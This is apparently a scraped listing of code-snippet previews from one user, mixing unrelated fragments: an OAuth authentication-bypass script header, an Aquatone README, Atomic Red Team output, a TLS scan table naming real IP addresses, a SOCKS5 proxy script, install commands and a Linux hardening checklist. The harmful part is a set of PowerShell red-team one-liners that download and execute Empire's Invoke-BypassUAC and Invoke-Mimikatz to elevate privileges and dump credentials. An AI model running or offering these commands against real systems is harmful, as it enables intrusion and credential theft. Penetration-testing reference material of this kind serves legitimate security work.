This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# Authentication bypass via OAuth implicit flow | |
from bs4 import BeautifulSoup | |
import requests | |
import sys | |
import time | |
import urllib3 | |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# AQUATONE | |
Aquatone is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface. | |
## Installation | |
1. Install [Google Chrome](https://www.google.com/chrome/) or [Chromium](https://www.chromium.org/getting-involved/download-chromium) browser -- **Note:** Google Chrome is currently giving unreliable results when running in *headless* mode, so it is recommended to install Chromium for the best results. | |
2. Download the [latest release](https://github.com/michenriksen/aquatone/releases/latest) of Aquatone for your operating system. | |
3. Uncompress the zip file and move the `aquatone` binary to your desired location. You probably want to move it to a location in your `$PATH` for easier use. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Description: | |
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
# Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Import Mimikatz Module to run further commands |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
_ _____ ___ __ __ ___ ____ ____ _____ ____ _____ _____ _ __ __ | |
/ \|_ _/ _ \| \/ |_ _/ ___| | _ \| ____| _ \ |_ _| ____| / \ | \/ | | |
/ _ \ | || | | | |\/| || | | | |_) | _| | | | | | | | _| / _ \ | |\/| | | |
/ ___ \| || |_| | | | || | |___ | _ <| |___| |_| | | | | |___ / ___ \| | | | | |
/_/ \_\_| \___/|_| |_|___\____| |_| \_\_____|____/ |_| |_____/_/ \_\_| |_| | |
[********BEGIN TEST*******] Data Compressed T1002 has 3 Test(s) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Affected Hosts FQDN NAT Country Status SSL Certificate Signed Using Weak Hashing Algorithm (Known CA) SSL Certificate Expiry SSL Certificate Chain Contains RSA Keys Less Than 2048 bits SSL Version 2 and 3 Protocol Detection SSL Medium Strength Cipher Suites Supported (SWEET32) SSL RC4 Cipher Suites Supported (Bar Mitzvah) SSL/TLS Diffie-Hellman Modulus <= 1024 Bits (Logjam) TLS Version 1.0 Protocol Detection Notes Advice from Mandiant | |
40.83.150.233 (443/TCP) MSFT P § Minimum Requirements for TLS Servers | |
40.83.150.233 (454/TCP) MSFT P NIST SP800-52 | |
40.83.150.233 (8172/TCP) MSFT P | |
52.249.56.193 (443/TCP) MSFT P Azure App Gateway for TEL Customer Avoid any use of the following: | |
59.124.168.164 (443/TCP) Taiwan P 1. SSLv2, SSLv3, TLS 1.0, and TLS 1.1 | |
61.210.160.152 (443/TCP) Japan P 2. Null / Anonymous cipher suites | |
61.210.162.134 (443/TCP) Japan P 3. Any export cipher suites and encryption using less than 128 bits | |
64.124.73 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# | |
fo = open("foo.txt", "wb") | |
print "Name of the file: ", fo.name | |
# Close opend file | |
fo.close() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl https://packages.microsoft.com/keys/microsoft.asc | gpg --dearmor > packages.microsoft.gpg | |
$ sudo install -o root -g root -m 644 packages.microsoft.gpg /usr/share/keyrings/ | |
$ sudo sh -c 'echo "deb [arch=amd64 signed-by=/usr/share/keyrings/packages.microsoft.gpg] https://packages.microsoft.com/repos/vscode stable main" > /etc/apt/sources.list.d/vscode.list' | |
$ sudo apt-get install apt-transport-https | |
$ sudo apt-get update | |
$ sudo apt-get install code |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Filename s5.py | |
# Python Dynamic Socks5 Proxy | |
# Usage: python s5.py 1080 | |
# Background Run: nohup python s5.py 1080 & | |
# Email: ringzero@557.im | |
import socket, sys, select, SocketServer, struct, time | |
class ThreadingTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl "https://raw.githubusercontent.com/andreafabrizi/Dropbox-Uploader/master/dropbox_uploader.sh" -o dropbox_uploader.sh |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Linux hardening checklist | |
* Partitioning | |
* Separate partitions | |
* Restrict mount options | |
* Polyinstantiated directories | |
* Shared memory | |
* Encrypt partitions | |
* Summary checklist | |
* Physical Access | |
* Password for Single User Mode |